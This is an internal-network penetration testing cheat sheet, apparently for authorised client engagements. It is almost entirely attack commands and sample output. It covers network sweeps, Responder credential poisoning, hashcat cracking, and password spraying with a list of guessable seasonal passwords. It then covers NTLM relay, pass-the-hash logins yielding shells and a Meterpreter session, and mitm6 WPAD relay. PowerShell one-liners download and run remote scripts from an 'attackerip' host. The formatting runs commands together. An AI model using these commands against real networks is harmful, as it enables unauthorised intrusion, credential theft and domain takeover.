Internal Network
Nmap Ping Scan Private Ranges and start responder
responder -i eth0​nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmpnmap -sn -n 172.16.0.0/12 | tee -a Targets.tmpnmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp​# Loud so only use if requiredmasscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmpmasscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmpmasscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp​#Note down IP addresses from responderresponder -I eth0cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp​#Note current IP address & scan rangeifconfignmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp​#netdiscovernetdiscover -i eth0 -P​#NBTScannbtscan 192.168.1.0/24
Now cat grep and sort the IP addresses into a file called Targets.txt
mkdir Scansnmap -p 21 -n --open -iL targets -oA Scans/ftpnmap -p 22 -n --open -iL targets -oA Scans/sshnmap -p 23 -n --open -iL targets -oA Scans/telnetnmap -p 80 -n --open -iL targets -oA Scans/httpnmap -p 443 -n --open -iL targets -oA Scans/httpsnmap -p 445 -n --open -iL targets -oA Scans/smbnmap -p 3389 -n --open -iL targets -oA Scans/rdp​cat Scans/ftp.nmap | grep for | cut -d " " -f 5 > ftphosts.txtcat Scans/ssh.nmap | grep for | cut -d " " -f 5 > sshhosts.txtcat Scans/telnet.nmap | grep for | cut -d " " -f 5 > telnethosts.txtcat Scans/http.nmap | grep for | cut -d " " -f 5 > httphosts.txtcat Scans/https.nmap | grep for | cut -d " " -f 5 > httpshosts.txtcat Scans/smb.nmap | grep for | cut -d " " -f 5 > smbhosts.txtcat Scans/rdp.nmap | grep for | cut -d " " -f 5 > rdphosts.txt
Start Nessus on discovered IP addresses
Run AutoScan.sh against all Targets.txt
Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at.
#!/bin/bashfor Target in $(cat Targets.txt)doecho "---------------------------------------------------------------" | tee -a Scanner.logecho "Auto Scanner" | tee -a Scanner.logecho "$Target - Scanned: $(date)" | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.logecho "" | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.logecho "TCP Scan Started: $(date)" | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.log#Fullnmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target | tee -a Scanner.log#Fast#nmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.logecho "UDP Scan Started: $(date)" | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.log#Full#nmap -sUV -sC --top-ports 200 -oN $Target-02-NmapUDP.txt $Target | tee -a Scanner.log#Fastnmap -sUV -sC --top-ports 10 -oN $Target-02-NmapUDP.txt $Target | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.logecho "Nikto Scan Started: $(date)" | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.lognikto -p 80,443,8000,8080 -h $Target | tee $Target-03-Nikto.txt | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.logecho "SSL Scan Started: $(date)" | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.logsslscan --show-certificate --no-colour $Target | tee $Target-04-SSLScan.txt | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.logecho "Directory Scan Started: $(date)" | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.loggobuster -u http://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.loggobuster -k -u https://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.logdonefor Target in $(cat Targets.txt)docat $Target-01-NmapTCP.txt | grep /tcp | grep open >> "$Target"_Ports.txt 2> /dev/nullcat $Target-02-NmapUDP.txt | grep /udp | grep open | grep -v filtered >> "$Target"_Ports.txt 2> /dev/null(input="$Target"_Ports.txtwhile IFS= read -r portdoecho "$Target":"$port" >> ServicesList.txtdone < "$Target"_Ports.txt)rm *_Ports.txtdoneechoecho "---------------------------------------------------------------" | tee -a Scanner.logecho "The following services were found:" | tee -a Scanner.logecho "---------------------------------------------------------------" | tee -a Scanner.logcat ServicesList.txt | tee -a Scanner.logdone
hashcat --force -m 5600 Hashes.txt /path/to/wordlist -r /path/to/rules
Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl
cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/
Then repeat the cracking process with a good rule list.
Get DC List
# Windows commandnltest /DCLIST:domain.local​# Linux Commandscat /etc/resolv.conf​nmap -p 88,389,636 -iL Targets.txt --open​for i in (cat Targets.txt); do nslookup $i | grep "dc"; done​nslookup> set type=all_ldap._tcp.dc._msdcs.DOMAIN
Get user list
rpcclient -U "domain\\username" 10.0.0.1 (DC)rpcclient $> enumdomusers
Copy list of users to "rpcuserlist.txt" file and sort:
cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt
Set a timer for every 30 minutes and rerun this attack.
May be worth checking the password lockout policy with the client if in a sensitive environment.
msfconsole -qset rhosts domaincontrolleripuse auxiliary/scanner/smb/smb_loginset SMBDomain domainset USER_FILE DomainUsers.txtset SMBPass firstpassworddate << adds a timestamprun
When time is up change the password and rerun.
Passwords to try:
Clientname2019Location2019Password12345!Summer2019!Spring2019!Summer2018!Password2018!Welcome2018!Password 2018!Summer@2018
Find open SMB shares which are available unauthenticated
for i in $(cat 00-Targets.txt);do smbmap -H $i; done | tee -a SMBMap-Output.txt
Find open writable shares and search for authenticated file servers:
for i in $(cat Targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txtleafpad SMBMap-Output.txtctrl + f WRITE (Search for writable folders)
python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml
Modify Responder.conf to turn off HTTP and SMB
[Responder Core]​; Servers to startSQL = OnSMB = Off << turn offKerberos = OnFTP = OnPOP = OnSMTP = OnIMAP = OnHTTP = Off << turn offHTTPS = OnDNS = OnLDAP = On
Start responder
python Responder.py -I <interface> -r -d -wresponder -I <interface> -r -d -w
Create a list of targets with SMB signing disabled.
nmap -n -p 137,139,445 --script=smb-security-mode 192.168.1.0/24 | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt
Now start ntlmrelayx.py against the targets
python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt
If you capture a high priv users account it will drop the hashes from the system
Now use psexec within metasploit to login to the target
msfconsoleuse exploit/windows/smb/psexecset lhost 192.168.1.1set rhost 192.168.1.11set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586cexploit
Either will do, once the enumeration has finished upload the csv files to your attacker machine.
Then run
python ntlmrelayx.py -tf smbsigningdisabled.txt
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name# Administrator: account's name# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exeE_md4hash wrapper called.HASH PASS: Substituting user supplied NTLM HASH...Microsoft Windows \[Version 6.3.9600\](c) 2013 Microsoft Corporation. All rights reserved.​C:\Windows\system32>whoamiServer\Administrator
root@Kali:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"root@Kali:~# pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"root@Kali:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$root@Kali:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
root@Kali:~# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 administrator@192.168.1.25Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies​[*] SMBv3.0 dialect used[!] Launching semi-interactive shell - Careful what you execute[!] Press help for extra shell commandsC:\>
root@Kali:~# apt-get updateroot@Kali:~# apt-get install freerdp-x11root@Kali:~# xfreerpd /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
msf > use auxiliary/admin/smb/psexec_commandmsf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5msf exploit(psexec) > set SMBUser Administratormsf exploit(psexec) > set SMBDomain WORKGROUPmsf exploit(psexec) > run[*] Started reverse TCP handler on 192.168.1.24:4444[*] 192.168.1.25:445 - Connecting to the server...[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...[*] 192.168.1.25:445 - Selecting PowerShell target[*] 192.168.1.25:445 - Executing the payload...[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...[*] Sending stage (957999 bytes) to 192.168.1.25[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200​meterpreter > exit
This will output the local hashes if you capture a domain admins NTLM hash.
Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py
Once on the domain as a windows user run the following:
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"
Once on your attacker machine make sure you have bloodhound installed and then execute:
neoj4 consolebloodhound
Visit 127.0.0.1:7687
Enter your password and upload the csv files you extracted from the target.
Click queries and then find shortest path to domain admin
git clone https://github.com/fox-it/mitm6.gitcd mitm6mitm6 -d domain.local
In a new window
ntlmrelayx.py -6 -t ldaps://domaincontrollerip -wh fakewpad.domain.local -l data
Wait 30 mins to an hour for the IPV6 to update
cd datafirefox domain_users_by_group.html
Review ntlmrelayx.py output and look for new user and password added when a DA logs in
​
Last updated 3 days ago